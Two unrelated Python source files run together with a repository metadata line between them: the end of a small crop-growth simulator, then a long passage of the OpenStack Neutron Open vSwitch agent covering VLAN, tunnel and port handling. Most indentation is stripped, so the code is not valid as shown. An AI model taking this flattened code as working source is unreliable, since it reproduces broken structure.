return {'Type':self._type, 'Status':self._status, 'Growth':self._growth, 'Days Growing':self._days_growing}
#Update Status
def _update_status(self):
if self._growth > 15:
self._status = "Old"
elif self._growth > 10:
self._status = "Mature"
elif self._growth > 5:
self._status = "Young"
elif self._growth > 0:
self._status = "Seedling"
elif self._growth == 0:
self._status = "Seed"
    # Let the crop grow
def grow(self, light, water):
if light >= self._light_need and water >= self._water_need:
self._growth += self._growth_rate
        # Increment the number of growing days
self._days_growing += 1
        # Update the status
self._update_status()
# Module-level function (independent of the class)
def auto_grow(crop, days):
for day in range (days):
light = random.randint(1,10)
water = random.randint(1,10)
crop.grow(light, water)
# Grow manually
def manual_grow(crop):
    # validate user input
valid = False
while not valid:
try:
light = int(input("Please enter Light Value between 1-10: "))
if 1 <= light <=10:
valid = True
            # Note: this else branch runs for integers outside 1-10; non-numeric
            # input is handled by the ValueError handler below
else:
print("No Valid Value, please enter between 1-10")
except ValueError:
print("No Valid Value, please enter between 1-10")
valid = False
while not valid:
try:
water = int(input("Please enter Water Value between 1-10: "))
if 1 <= water <=10:
valid = True
else:
print("No Valid Value, please enter between 1-10")
except ValueError:
print("No Valid Value, please enter between 1-10")
    # Values set, grow the crop
crop.grow(light, water)
# GENERAL: FOR TESTING PURPOSES ONLY
def display_menu():
print("1. Grow manually over 1 day")
print("2. Grow automatically over 30 days")
print("3. Report status")
print("0. Exit test program")
print()
print("Please select an option from the above menu")
def get_menu_choice():
option_valid = False
while not option_valid:
try:
choice = int(input("Option Selected: "))
if 0 <= choice <= 4:
option_valid = True
else:
print("Please enter a valid option")
except ValueError:
print("Please enter a valid option")
return choice
def manage_crop(crop):
print("This is the crop management program")
print()
noexit = True
while noexit:
display_menu()
option = get_menu_choice()
print()
if option == 1:
manual_grow(crop)
print()
elif option == 2:
auto_grow(crop, 30)
print()
elif option == 3:
print(crop.report())
print()
elif option == 0:
noexit = False
print()
print("Thank you for using the crop management program")
"""
def main():
    # create test instances
new_crop=Crop(1,4,3)
new_crop2=Crop(2,5,7)
    # testing
#print(new_crop._status)
#print(new_crop._light_need)
#print(new_crop._water_need)
#print(new_crop2._status)
#print(new_crop2._light_need)
#print(new_crop2._water_need)
#print(new_crop.needs())
#print(new_crop.report())
#new_crop.grow(4,4)
#auto_grow(new_crop, 20)
#manual_grow(new_crop)
#print(new_crop.report())
manage_crop(new_crop)
if __name__ == "__main__":
main()
""" | Tanoshinderuyo/Python | CropSimulator/crop_class.py | Python | gpl-2.0 | 3,607 |
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import logging as std_logging
import signal
import sys
import time
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_service import loopingcall
import six
from six import moves
from neutron.agent.common import ovs_lib
from neutron.agent.common import polling
from neutron.agent.common import utils
from neutron.agent.linux import ip_lib
from neutron.agent import rpc as agent_rpc
from neutron.agent import securitygroups_rpc as sg_rpc
from neutron.api.rpc.handlers import dvr_rpc
from neutron.common import config
from neutron.common import constants as n_const
from neutron.common import exceptions
from neutron.common import topics
from neutron.common import utils as n_utils
from neutron import context
from neutron.i18n import _LE, _LI, _LW
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers.l2pop.rpc_manager import l2population_rpc
from neutron.plugins.ml2.drivers.openvswitch.agent.common \
import constants
from neutron.plugins.ml2.drivers.openvswitch.agent \
import ovs_dvr_neutron_agent
LOG = logging.getLogger(__name__)
cfg.CONF.import_group('AGENT', 'neutron.plugins.ml2.drivers.openvswitch.'
'agent.common.config')
cfg.CONF.import_group('OVS', 'neutron.plugins.ml2.drivers.openvswitch.agent.'
'common.config')
# A placeholder for dead vlans.
DEAD_VLAN_TAG = p_const.MAX_VLAN_TAG + 1
class _mac_mydialect(netaddr.mac_unix):
word_fmt = '%.2x'
class DeviceListRetrievalError(exceptions.NeutronException):
message = _("Unable to retrieve port details for devices: %(devices)s ")
# A class to represent a VIF (i.e., a port that has 'iface-id' and 'vif-mac'
# attributes set).
class LocalVLANMapping(object):
def __init__(self, vlan, network_type, physical_network, segmentation_id,
vif_ports=None):
if vif_ports is None:
vif_ports = {}
self.vlan = vlan
self.network_type = network_type
self.physical_network = physical_network
self.segmentation_id = segmentation_id
self.vif_ports = vif_ports
# set of tunnel ports on which packets should be flooded
self.tun_ofports = set()
def __str__(self):
return ("lv-id = %s type = %s phys-net = %s phys-id = %s" %
(self.vlan, self.network_type, self.physical_network,
self.segmentation_id))
class OVSPluginApi(agent_rpc.PluginApi):
pass
class OVSNeutronAgent(sg_rpc.SecurityGroupAgentRpcCallbackMixin,
l2population_rpc.L2populationRpcCallBackTunnelMixin,
dvr_rpc.DVRAgentRpcCallbackMixin):
'''Implements OVS-based tunneling, VLANs and flat networks.
Two local bridges are created: an integration bridge (defaults to
'br-int') and a tunneling bridge (defaults to 'br-tun'). An
additional bridge is created for each physical network interface
used for VLANs and/or flat networks.
All VM VIFs are plugged into the integration bridge. VM VIFs on a
given virtual network share a common "local" VLAN (i.e. not
propagated externally). The VLAN id of this local VLAN is mapped
to the physical networking details realizing that virtual network.
For virtual networks realized as GRE tunnels, a Logical Switch
(LS) identifier is used to differentiate tenant traffic on
inter-HV tunnels. A mesh of tunnels is created to other
Hypervisors in the cloud. These tunnels originate and terminate on
the tunneling bridge of each hypervisor. Port patching is done to
connect local VLANs on the integration bridge to inter-hypervisor
tunnels on the tunnel bridge.
For each virtual network realized as a VLAN or flat network, a
veth or a pair of patch ports is used to connect the local VLAN on
the integration bridge with the physical network bridge, with flow
rules adding, modifying, or stripping VLAN tags as necessary.
'''
# history
# 1.0 Initial version
# 1.1 Support Security Group RPC
# 1.2 Support DVR (Distributed Virtual Router) RPC
# 1.3 Added param devices_to_update to security_groups_provider_updated
target = oslo_messaging.Target(version='1.3')
def __init__(self, bridge_classes, integ_br, tun_br, local_ip,
bridge_mappings, polling_interval, tunnel_types=None,
veth_mtu=None, l2_population=False,
enable_distributed_routing=False,
minimize_polling=False,
ovsdb_monitor_respawn_interval=(
constants.DEFAULT_OVSDBMON_RESPAWN),
arp_responder=False,
prevent_arp_spoofing=True,
use_veth_interconnection=False,
quitting_rpc_timeout=None,
conf=None):
'''Constructor.
:param bridge_classes: a dict for bridge classes.
:param integ_br: name of the integration bridge.
:param tun_br: name of the tunnel bridge.
:param local_ip: local IP address of this hypervisor.
:param bridge_mappings: mappings from physical network name to bridge.
:param polling_interval: interval (secs) to poll DB.
:param tunnel_types: A list of tunnel types to enable support for in
the agent. If set, will automatically set enable_tunneling to
True.
:param veth_mtu: MTU size for veth interfaces.
:param l2_population: Optional, whether L2 population is turned on
:param minimize_polling: Optional, whether to minimize polling by
monitoring ovsdb for interface changes.
:param ovsdb_monitor_respawn_interval: Optional, when using polling
minimization, the number of seconds to wait before respawning
the ovsdb monitor.
:param arp_responder: Optional, enable local ARP responder if it is
supported.
:param prevent_arp_spoofing: Optional, enable suppression of any ARP
responses from ports that don't match an IP address that belongs
to the ports. Spoofing rules will not be added to ports that
have port security disabled.
:param use_veth_interconnection: use veths instead of patch ports to
interconnect the integration bridge to physical bridges.
:param quitting_rpc_timeout: timeout in seconds for rpc calls after
SIGTERM is received
:param conf: an instance of ConfigOpts
'''
super(OVSNeutronAgent, self).__init__()
self.br_int_cls = bridge_classes['br_int']
self.br_phys_cls = bridge_classes['br_phys']
self.br_tun_cls = bridge_classes['br_tun']
self.use_veth_interconnection = use_veth_interconnection
self.veth_mtu = veth_mtu
self.available_local_vlans = set(moves.range(p_const.MIN_VLAN_TAG,
p_const.MAX_VLAN_TAG))
self.use_call = True
self.tunnel_types = tunnel_types or []
self.l2_pop = l2_population
# TODO(ethuleau): Change ARP responder so it's not dependent on the
# ML2 l2 population mechanism driver.
self.enable_distributed_routing = enable_distributed_routing
self.arp_responder_enabled = arp_responder and self.l2_pop
self.prevent_arp_spoofing = prevent_arp_spoofing
self.conf = conf or cfg.CONF
self.agent_state = {
'binary': 'neutron-openvswitch-agent',
'host': self.conf.host,
'topic': n_const.L2_AGENT_TOPIC,
'configurations': {'bridge_mappings': bridge_mappings,
'tunnel_types': self.tunnel_types,
'tunneling_ip': local_ip,
'l2_population': self.l2_pop,
'arp_responder_enabled':
self.arp_responder_enabled,
'enable_distributed_routing':
self.enable_distributed_routing,
'log_agent_heartbeats':
self.conf.AGENT.log_agent_heartbeats},
'agent_type': n_const.AGENT_TYPE_OVS,
'start_flag': True}
if tunnel_types:
self.enable_tunneling = True
else:
self.enable_tunneling = False
# Validate agent configurations
self._check_agent_configurations()
# Keep track of int_br's device count for use by _report_state()
self.int_br_device_count = 0
self.int_br = self.br_int_cls(integ_br)
self.setup_integration_br()
# Stores port update notifications for processing in main rpc loop
self.updated_ports = set()
# Stores port delete notifications
self.deleted_ports = set()
# keeps association between ports and ofports to detect ofport change
self.vifname_to_ofport_map = {}
self.setup_rpc()
self.bridge_mappings = bridge_mappings
self.setup_physical_bridges(self.bridge_mappings)
self.local_vlan_map = {}
self.tun_br_ofports = {p_const.TYPE_GRE: {},
p_const.TYPE_VXLAN: {}}
self.polling_interval = polling_interval
self.minimize_polling = minimize_polling
self.ovsdb_monitor_respawn_interval = ovsdb_monitor_respawn_interval
self.local_ip = local_ip
self.tunnel_count = 0
self.vxlan_udp_port = self.conf.AGENT.vxlan_udp_port
self.dont_fragment = self.conf.AGENT.dont_fragment
self.tun_br = None
self.patch_int_ofport = constants.OFPORT_INVALID
self.patch_tun_ofport = constants.OFPORT_INVALID
if self.enable_tunneling:
# The patch_int_ofport and patch_tun_ofport are updated
# here inside the call to reset_tunnel_br()
self.reset_tunnel_br(tun_br)
self.dvr_agent = ovs_dvr_neutron_agent.OVSDVRNeutronAgent(
self.context,
self.dvr_plugin_rpc,
self.int_br,
self.tun_br,
self.bridge_mappings,
self.phys_brs,
self.int_ofports,
self.phys_ofports,
self.patch_int_ofport,
self.patch_tun_ofport,
self.conf.host,
self.enable_tunneling,
self.enable_distributed_routing)
report_interval = self.conf.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval)
if self.enable_tunneling:
self.setup_tunnel_br()
self.dvr_agent.setup_dvr_flows()
# Collect additional bridges to monitor
self.ancillary_brs = self.setup_ancillary_bridges(integ_br, tun_br)
# In order to keep existed device's local vlan unchanged,
# restore local vlan mapping at start
self._restore_local_vlan_map()
# Security group agent support
self.sg_agent = sg_rpc.SecurityGroupAgentRpc(self.context,
self.sg_plugin_rpc, self.local_vlan_map,
defer_refresh_firewall=True)
# Initialize iteration counter
self.iter_num = 0
self.run_daemon_loop = True
self.catch_sigterm = False
self.catch_sighup = False
# The initialization is complete; we can start receiving messages
self.connection.consume_in_threads()
self.quitting_rpc_timeout = quitting_rpc_timeout
def _report_state(self):
# How many devices are likely used by a VM
self.agent_state.get('configurations')['devices'] = (
self.int_br_device_count)
self.agent_state.get('configurations')['in_distributed_mode'] = (
self.dvr_agent.in_distributed_mode())
try:
self.state_rpc.report_state(self.context,
self.agent_state,
self.use_call)
self.use_call = False
self.agent_state.pop('start_flag', None)
except Exception:
LOG.exception(_LE("Failed reporting state!"))
def _restore_local_vlan_map(self):
cur_ports = self.int_br.get_vif_ports()
port_info = self.int_br.db_list(
"Port", columns=["name", "other_config", "tag"])
by_name = {x['name']: x for x in port_info}
for port in cur_ports:
# if a port was deleted between get_vif_ports and db_lists, we
# will get a KeyError
try:
local_vlan_map = by_name[port.port_name]['other_config']
local_vlan = by_name[port.port_name]['tag']
except KeyError:
continue
if not local_vlan:
continue
net_uuid = local_vlan_map.get('net_uuid')
if (net_uuid and net_uuid not in self.local_vlan_map
and local_vlan != DEAD_VLAN_TAG):
self.provision_local_vlan(local_vlan_map['net_uuid'],
local_vlan_map['network_type'],
local_vlan_map['physical_network'],
local_vlan_map['segmentation_id'],
local_vlan)
def setup_rpc(self):
self.agent_id = 'ovs-agent-%s' % self.conf.host
self.topic = topics.AGENT
self.plugin_rpc = OVSPluginApi(topics.PLUGIN)
self.sg_plugin_rpc = sg_rpc.SecurityGroupServerRpcApi(topics.PLUGIN)
self.dvr_plugin_rpc = dvr_rpc.DVRServerRpcApi(topics.PLUGIN)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
# RPC network init
self.context = context.get_admin_context_without_session()
# Handle updates from service
self.endpoints = [self]
# Define the listening consumers for the agent
consumers = [[topics.PORT, topics.UPDATE],
[topics.PORT, topics.DELETE],
[constants.TUNNEL, topics.UPDATE],
[constants.TUNNEL, topics.DELETE],
[topics.SECURITY_GROUP, topics.UPDATE],
[topics.DVR, topics.UPDATE]]
if self.l2_pop:
consumers.append([topics.L2POPULATION,
topics.UPDATE, self.conf.host])
self.connection = agent_rpc.create_consumers(self.endpoints,
self.topic,
consumers,
start_listening=False)
def get_net_uuid(self, vif_id):
for network_id, vlan_mapping in six.iteritems(self.local_vlan_map):
if vif_id in vlan_mapping.vif_ports:
return network_id
def port_update(self, context, **kwargs):
port = kwargs.get('port')
# Put the port identifier in the updated_ports set.
# Even if full port details might be provided to this call,
# they are not used since there is no guarantee the notifications
# are processed in the same order as the relevant API requests
self.updated_ports.add(port['id'])
LOG.debug("port_update message processed for port %s", port['id'])
def port_delete(self, context, **kwargs):
port_id = kwargs.get('port_id')
self.deleted_ports.add(port_id)
LOG.debug("port_delete message processed for port %s", port_id)
def process_deleted_ports(self, port_info):
# don't try to process removed ports as deleted ports since
# they are already gone
if 'removed' in port_info:
self.deleted_ports -= port_info['removed']
while self.deleted_ports:
port_id = self.deleted_ports.pop()
# Flush firewall rules and move to dead VLAN so deleted ports no
# longer have access to the network
self.sg_agent.remove_devices_filter([port_id])
port = self.int_br.get_vif_port_by_id(port_id)
if port:
# don't log errors since there is a chance someone will be
# removing the port from the bridge at the same time
self.port_dead(port, log_errors=False)
self.port_unbound(port_id)
def tunnel_update(self, context, **kwargs):
LOG.debug("tunnel_update received")
if not self.enable_tunneling:
return
tunnel_ip = kwargs.get('tunnel_ip')
tunnel_ip_hex = self.get_ip_in_hex(tunnel_ip)
if not tunnel_ip_hex:
return
tunnel_type = kwargs.get('tunnel_type')
if not tunnel_type:
LOG.error(_LE("No tunnel_type specified, cannot create tunnels"))
return
if tunnel_type not in self.tunnel_types:
LOG.error(_LE("tunnel_type %s not supported by agent"),
tunnel_type)
return
if tunnel_ip == self.local_ip:
return
tun_name = '%s-%s' % (tunnel_type, tunnel_ip_hex)
if not self.l2_pop:
self._setup_tunnel_port(self.tun_br, tun_name, tunnel_ip,
tunnel_type)
def tunnel_delete(self, context, **kwargs):
LOG.debug("tunnel_delete received")
if not self.enable_tunneling:
return
tunnel_ip = kwargs.get('tunnel_ip')
if not tunnel_ip:
LOG.error(_LE("No tunnel_ip specified, cannot delete tunnels"))
return
tunnel_type = kwargs.get('tunnel_type')
if not tunnel_type:
LOG.error(_LE("No tunnel_type specified, cannot delete tunnels"))
return
if tunnel_type not in self.tunnel_types:
LOG.error(_LE("tunnel_type %s not supported by agent"),
tunnel_type)
return
ofport = self.tun_br_ofports[tunnel_type].get(tunnel_ip)
self.cleanup_tunnel_port(self.tun_br, ofport, tunnel_type)
def _tunnel_port_lookup(self, network_type, remote_ip):
return self.tun_br_ofports[network_type].get(remote_ip)
def fdb_add(self, context, fdb_entries):
LOG.debug("fdb_add received")
for lvm, agent_ports in self.get_agent_ports(fdb_entries,
self.local_vlan_map):
agent_ports.pop(self.local_ip, None)
if len(agent_ports):
if not self.enable_distributed_routing:
with self.tun_br.deferred() as deferred_br:
self.fdb_add_tun(context, deferred_br, lvm,
agent_ports, self._tunnel_port_lookup)
else:
self.fdb_add_tun(context, self.tun_br, lvm,
agent_ports, self._tunnel_port_lookup)
def fdb_remove(self, context, fdb_entries):
LOG.debug("fdb_remove received")
for lvm, agent_ports in self.get_agent_ports(fdb_entries,
self.local_vlan_map):
agent_ports.pop(self.local_ip, None)
if len(agent_ports):
if not self.enable_distributed_routing:
with self.tun_br.deferred() as deferred_br:
self.fdb_remove_tun(context, deferred_br, lvm,
agent_ports,
self._tunnel_port_lookup)
else:
self.fdb_remove_tun(context, self.tun_br, lvm,
agent_ports, self._tunnel_port_lookup)
def add_fdb_flow(self, br, port_info, remote_ip, lvm, ofport):
if port_info == n_const.FLOODING_ENTRY:
lvm.tun_ofports.add(ofport)
br.install_flood_to_tun(lvm.vlan, lvm.segmentation_id,
lvm.tun_ofports)
else:
self.setup_entry_for_arp_reply(br, 'add', lvm.vlan,
port_info.mac_address,
port_info.ip_address)
br.install_unicast_to_tun(lvm.vlan,
lvm.segmentation_id,
ofport,
port_info.mac_address)
def del_fdb_flow(self, br, port_info, remote_ip, lvm, ofport):
if port_info == n_const.FLOODING_ENTRY:
if ofport not in lvm.tun_ofports:
LOG.debug("attempt to remove a non-existent port %s", ofport)
return
lvm.tun_ofports.remove(ofport)
if len(lvm.tun_ofports) > 0:
br.install_flood_to_tun(lvm.vlan, lvm.segmentation_id,
lvm.tun_ofports)
else:
# This local vlan doesn't require any more tunnelling
br.delete_flood_to_tun(lvm.vlan)
else:
self.setup_entry_for_arp_reply(br, 'remove', lvm.vlan,
port_info.mac_address,
port_info.ip_address)
br.delete_unicast_to_tun(lvm.vlan, port_info.mac_address)
def _fdb_chg_ip(self, context, fdb_entries):
LOG.debug("update chg_ip received")
with self.tun_br.deferred() as deferred_br:
self.fdb_chg_ip_tun(context, deferred_br, fdb_entries,
self.local_ip, self.local_vlan_map)
def setup_entry_for_arp_reply(self, br, action, local_vid, mac_address,
ip_address):
'''Set the ARP respond entry.
When the l2 population mechanism driver and OVS supports to edit ARP
fields, a table (ARP_RESPONDER) to resolve ARP locally is added to the
tunnel bridge.
'''
if not self.arp_responder_enabled:
return
mac = str(netaddr.EUI(mac_address, dialect=_mac_mydialect))
ip = str(netaddr.IPAddress(ip_address))
if action == 'add':
br.install_arp_responder(local_vid, ip, mac)
elif action == 'remove':
br.delete_arp_responder(local_vid, ip)
else:
LOG.warning(_LW('Action %s not supported'), action)
def _local_vlan_for_flat(self, lvid, physical_network):
phys_br = self.phys_brs[physical_network]
phys_port = self.phys_ofports[physical_network]
int_br = self.int_br
int_port = self.int_ofports[physical_network]
phys_br.provision_local_vlan(port=phys_port, lvid=lvid,
segmentation_id=None,
distributed=False)
int_br.provision_local_vlan(port=int_port, lvid=lvid,
segmentation_id=None)
def _local_vlan_for_vlan(self, lvid, physical_network, segmentation_id):
distributed = self.enable_distributed_routing
phys_br = self.phys_brs[physical_network]
phys_port = self.phys_ofports[physical_network]
int_br = self.int_br
int_port = self.int_ofports[physical_network]
phys_br.provision_local_vlan(port=phys_port, lvid=lvid,
segmentation_id=segmentation_id,
distributed=distributed)
int_br.provision_local_vlan(port=int_port, lvid=lvid,
segmentation_id=segmentation_id)
def provision_local_vlan(self, net_uuid, network_type, physical_network,
segmentation_id, local_vlan=None):
'''Provisions a local VLAN.
:param net_uuid: the uuid of the network associated with this vlan.
:param network_type: the network type ('gre', 'vxlan', 'vlan', 'flat',
'local')
:param physical_network: the physical network for 'vlan' or 'flat'
:param segmentation_id: the VID for 'vlan' or tunnel ID for 'tunnel'
'''
# On a restart or crash of OVS, the network associated with this VLAN
# will already be assigned, so check for that here before assigning a
# new one.
lvm = self.local_vlan_map.get(net_uuid)
if lvm:
lvid = lvm.vlan
else:
if local_vlan in self.available_local_vlans:
lvid = local_vlan
self.available_local_vlans.remove(local_vlan)
else:
if not self.available_local_vlans:
LOG.error(_LE("No local VLAN available for net-id=%s"),
net_uuid)
return
lvid = self.available_local_vlans.pop()
self.local_vlan_map[net_uuid] = LocalVLANMapping(lvid,
network_type,
physical_network,
segmentation_id)
LOG.info(_LI("Assigning %(vlan_id)s as local vlan for "
"net-id=%(net_uuid)s"),
{'vlan_id': lvid, 'net_uuid': net_uuid})
if network_type in constants.TUNNEL_NETWORK_TYPES:
if self.enable_tunneling:
# outbound broadcast/multicast
ofports = self.tun_br_ofports[network_type].values()
if ofports:
self.tun_br.install_flood_to_tun(lvid,
segmentation_id,
ofports)
# inbound from tunnels: set lvid in the right table
# and resubmit to Table LEARN_FROM_TUN for mac learning
if self.enable_distributed_routing:
self.dvr_agent.process_tunneled_network(
network_type, lvid, segmentation_id)
else:
self.tun_br.provision_local_vlan(
network_type=network_type, lvid=lvid,
segmentation_id=segmentation_id)
else:
LOG.error(_LE("Cannot provision %(network_type)s network for "
"net-id=%(net_uuid)s - tunneling disabled"),
{'network_type': network_type,
'net_uuid': net_uuid})
elif network_type == p_const.TYPE_FLAT:
if physical_network in self.phys_brs:
self._local_vlan_for_flat(lvid, physical_network)
else:
LOG.error(_LE("Cannot provision flat network for "
"net-id=%(net_uuid)s - no bridge for "
"physical_network %(physical_network)s"),
{'net_uuid': net_uuid,
'physical_network': physical_network})
elif network_type == p_const.TYPE_VLAN:
if physical_network in self.phys_brs:
self._local_vlan_for_vlan(lvid, physical_network,
segmentation_id)
else:
LOG.error(_LE("Cannot provision VLAN network for "
"net-id=%(net_uuid)s - no bridge for "
"physical_network %(physical_network)s"),
{'net_uuid': net_uuid,
'physical_network': physical_network})
elif network_type == p_const.TYPE_LOCAL:
# no flows needed for local networks
pass
else:
LOG.error(_LE("Cannot provision unknown network type "
"%(network_type)s for net-id=%(net_uuid)s"),
{'network_type': network_type,
'net_uuid': net_uuid})
def reclaim_local_vlan(self, net_uuid):
'''Reclaim a local VLAN.
:param net_uuid: the network uuid associated with this vlan.
'''
lvm = self.local_vlan_map.pop(net_uuid, None)
if lvm is None:
LOG.debug("Network %s not used on agent.", net_uuid)
return
LOG.info(_LI("Reclaiming vlan = %(vlan_id)s from "
"net-id = %(net_uuid)s"),
{'vlan_id': lvm.vlan, 'net_uuid': net_uuid})
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
if self.enable_tunneling:
self.tun_br.reclaim_local_vlan(
network_type=lvm.network_type,
segmentation_id=lvm.segmentation_id)
self.tun_br.delete_flood_to_tun(lvm.vlan)
self.tun_br.delete_unicast_to_tun(lvm.vlan, None)
self.tun_br.delete_arp_responder(lvm.vlan, None)
if self.l2_pop:
# Try to remove tunnel ports if not used by other networks
for ofport in lvm.tun_ofports:
self.cleanup_tunnel_port(self.tun_br, ofport,
lvm.network_type)
elif lvm.network_type == p_const.TYPE_FLAT:
if lvm.physical_network in self.phys_brs:
# outbound
br = self.phys_brs[lvm.physical_network]
br.reclaim_local_vlan(
port=self.phys_ofports[lvm.physical_network],
lvid=lvm.vlan)
# inbound
br = self.int_br
br.reclaim_local_vlan(
port=self.int_ofports[lvm.physical_network],
segmentation_id=None)
elif lvm.network_type == p_const.TYPE_VLAN:
if lvm.physical_network in self.phys_brs:
# outbound
br = self.phys_brs[lvm.physical_network]
br.reclaim_local_vlan(
port=self.phys_ofports[lvm.physical_network],
lvid=lvm.vlan)
# inbound
br = self.int_br
br.reclaim_local_vlan(
port=self.int_ofports[lvm.physical_network],
segmentation_id=lvm.segmentation_id)
elif lvm.network_type == p_const.TYPE_LOCAL:
# no flows needed for local networks
pass
else:
LOG.error(_LE("Cannot reclaim unknown network type "
"%(network_type)s for net-id=%(net_uuid)s"),
{'network_type': lvm.network_type,
'net_uuid': net_uuid})
self.available_local_vlans.add(lvm.vlan)
def port_bound(self, port, net_uuid,
network_type, physical_network,
segmentation_id, fixed_ips, device_owner,
ovs_restarted):
'''Bind port to net_uuid/lsw_id and install flow for inbound traffic
to vm.
:param port: a ovs_lib.VifPort object.
:param net_uuid: the net_uuid this port is to be associated with.
:param network_type: the network type ('gre', 'vlan', 'flat', 'local')
:param physical_network: the physical network for 'vlan' or 'flat'
:param segmentation_id: the VID for 'vlan' or tunnel ID for 'tunnel'
:param fixed_ips: the ip addresses assigned to this port
:param device_owner: the string indicative of owner of this port
:param ovs_restarted: indicates if this is called for an OVS restart.
'''
if net_uuid not in self.local_vlan_map or ovs_restarted:
self.provision_local_vlan(net_uuid, network_type,
physical_network, segmentation_id)
lvm = self.local_vlan_map[net_uuid]
lvm.vif_ports[port.vif_id] = port
self.dvr_agent.bind_port_to_dvr(port, lvm,
fixed_ips,
device_owner)
port_other_config = self.int_br.db_get_val("Port", port.port_name,
"other_config")
vlan_mapping = {'net_uuid': net_uuid,
'network_type': network_type,
'physical_network': physical_network,
'segmentation_id': segmentation_id}
port_other_config.update(vlan_mapping)
self.int_br.set_db_attribute("Port", port.port_name, "other_config",
port_other_config)
def _bind_devices(self, need_binding_ports):
devices_up = []
devices_down = []
port_info = self.int_br.db_list(
"Port", columns=["name", "tag"])
tags_by_name = {x['name']: x['tag'] for x in port_info}
for port_detail in need_binding_ports:
lvm = self.local_vlan_map.get(port_detail['network_id'])
if not lvm:
# network for port was deleted. skip this port since it
# will need to be handled as a DEAD port in the next scan
continue
port = port_detail['vif_port']
device = port_detail['device']
# Do not bind a port if it's already bound
cur_tag = tags_by_name.get(port.port_name)
if cur_tag != lvm.vlan:
self.int_br.set_db_attribute(
"Port", port.port_name, "tag", lvm.vlan)
if port.ofport != -1:
# NOTE(yamamoto): Remove possible drop_port flow
# installed by port_dead.
self.int_br.delete_flows(in_port=port.ofport)
# update plugin about port status
# FIXME(salv-orlando): Failures while updating device status
# must be handled appropriately. Otherwise this might prevent
# neutron server from sending network-vif-* events to the nova
# API server, thus possibly preventing instance spawn.
if port_detail.get('admin_state_up'):
LOG.debug("Setting status for %s to UP", device)
devices_up.append(device)
else:
LOG.debug("Setting status for %s to DOWN", device)
devices_down.append(device)
failed_devices = []
if devices_up or devices_down:
devices_set = self.plugin_rpc.update_device_list(
self.context, devices_up, devices_down, self.agent_id,
self.conf.host)
failed_devices = (devices_set.get('failed_devices_up') +
devices_set.get('failed_devices_down'))
if failed_devices:
LOG.error(_LE("Configuration for devices %s failed!"),
failed_devices)
#TODO(rossella_s) handle better the resync in next patches,
# this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=failed_devices)
LOG.info(_LI("Configuration for devices up %(up)s and devices "
"down %(down)s completed."),
{'up': devices_up, 'down': devices_down})
@staticmethod
def setup_arp_spoofing_protection(bridge, vif, port_details):
# clear any previous flows related to this port in our ARP table
bridge.delete_arp_spoofing_protection(port=vif.ofport)
if not port_details.get('port_security_enabled', True):
LOG.info(_LI("Skipping ARP spoofing rules for port '%s' because "
"it has port security disabled"), vif.port_name)
return
# collect all of the addresses and cidrs that belong to the port
addresses = {f['ip_address'] for f in port_details['fixed_ips']}
if port_details.get('allowed_address_pairs'):
addresses |= {p['ip_address']
for p in port_details['allowed_address_pairs']}
addresses = {ip for ip in addresses
if netaddr.IPNetwork(ip).version == 4}
if any(netaddr.IPNetwork(ip).prefixlen == 0 for ip in addresses):
# don't try to install protection because a /0 prefix allows any
# address anyway and the ARP_SPA can only match on /1 or more.
return
bridge.install_arp_spoofing_protection(port=vif.ofport,
ip_addresses=addresses)
def port_unbound(self, vif_id, net_uuid=None):
'''Unbind port.
Removes corresponding local vlan mapping object if this is its last
VIF.
:param vif_id: the id of the vif
:param net_uuid: the net_uuid this port is associated with.
'''
if net_uuid is None:
net_uuid = self.get_net_uuid(vif_id)
if not self.local_vlan_map.get(net_uuid):
LOG.info(_LI('port_unbound(): net_uuid %s not in local_vlan_map'),
net_uuid)
return
lvm = self.local_vlan_map[net_uuid]
if vif_id in lvm.vif_ports:
vif_port = lvm.vif_ports[vif_id]
self.dvr_agent.unbind_port_from_dvr(vif_port, lvm)
lvm.vif_ports.pop(vif_id, None)
if not lvm.vif_ports:
self.reclaim_local_vlan(net_uuid)
def port_dead(self, port, log_errors=True):
'''Once a port has no binding, put it on the "dead vlan".
:param port: a ovs_lib.VifPort object.
'''
# Don't kill a port if it's already dead
cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",
log_errors=log_errors)
if cur_tag != DEAD_VLAN_TAG:
self.int_br.set_db_attribute("Port", port.port_name, "tag",
DEAD_VLAN_TAG, log_errors=log_errors)
self.int_br.drop_port(in_port=port.ofport)
def setup_integration_br(self):
'''Setup the integration bridge.
Delete patch ports and remove all existing flows.
'''
# Ensure the integration bridge is created.
# ovs_lib.OVSBridge.create() will run
# ovs-vsctl -- --may-exist add-br BRIDGE_NAME
# which does nothing if bridge already exists.
self.int_br.create()
self.int_br.set_secure_mode()
self.int_br.setup_controllers(self.conf)
self.int_br.delete_port(self.conf.OVS.int_peer_patch_port)
self.int_br.setup_default_table()
def setup_ancillary_bridges(self, integ_br, tun_br):
'''Setup ancillary bridges - for example br-ex.'''
ovs = ovs_lib.BaseOVS()
ovs_bridges = set(ovs.get_bridges())
# Remove all known bridges
ovs_bridges.remove(integ_br)
if self.enable_tunneling:
ovs_bridges.remove(tun_br)
br_names = [self.phys_brs[physical_network].br_name for
physical_network in self.phys_brs]
ovs_bridges.difference_update(br_names)
# Filter list of bridges to those that have external
# bridge-id's configured
br_names = []
for bridge in ovs_bridges:
bridge_id = ovs.get_bridge_external_bridge_id(bridge)
if bridge_id != bridge:
br_names.append(bridge)
ovs_bridges.difference_update(br_names)
ancillary_bridges = []
for bridge in ovs_bridges:
br = ovs_lib.OVSBridge(bridge)
LOG.info(_LI('Adding %s to list of bridges.'), bridge)
ancillary_bridges.append(br)
return ancillary_bridges
def reset_tunnel_br(self, tun_br_name=None):
'''(re)initialize the tunnel bridge.
Creates tunnel bridge, and links it to the integration bridge
using a patch port.
